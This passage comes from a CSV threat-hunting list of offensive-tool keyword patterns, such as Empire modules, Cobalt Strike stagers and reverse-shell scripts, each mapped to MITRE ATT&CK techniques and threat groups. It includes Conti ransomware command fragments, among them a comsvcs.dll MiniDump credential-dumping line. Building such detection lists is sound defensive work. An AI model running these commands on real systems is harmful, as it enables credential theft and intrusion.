T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass quser*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #10,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #13,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass Password1234*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #12,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*powershell_code_execution_invoke_assembly*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_collection_keylogger*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_collection_screenshot*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_command_x64.ps1*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*powershell_command_x86.ps1*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*powershell_credentials_tokens*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_encode_oneliner*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*powershell_encode_oneliner*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*powershell_encode_stager*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*powershell_encode_stager*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*powershell_management_psinject*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_management_spawn*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*PowerShell_PoC.zip*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*powershell_privesc_bypassuac_eventvwr*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_privesc_sherlock*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_reverse_shell.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*powershell_reverse_tcp.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*powershell_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*powershell_reverse_tcp_v2.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*powershell-admin-download-execute.ino*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*PowershellAgentGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PowershellAmsiGenerator*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PowerShellArsenal*,offensive_tool_keyword,PowerShellArsenal,PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.,T1057 - T1053 - T1050 - T1564 - T1083 - T1003,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/mattifestation/PowerShellArsenal,1,1,N/A,N/A,9,827,224,2021-08-20T08:41:50Z,2014-11-16T15:20:17Z -*PowerShellArtifactGenerator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*PowershellCradleGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PowerShellEmpire*,offensive_tool_keyword,empire,PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://www.powershellempire.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PowerShellExecuter.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*powershell-import *.ps1*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*powershell-import*Invoke-Kerberoast.ps1*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - 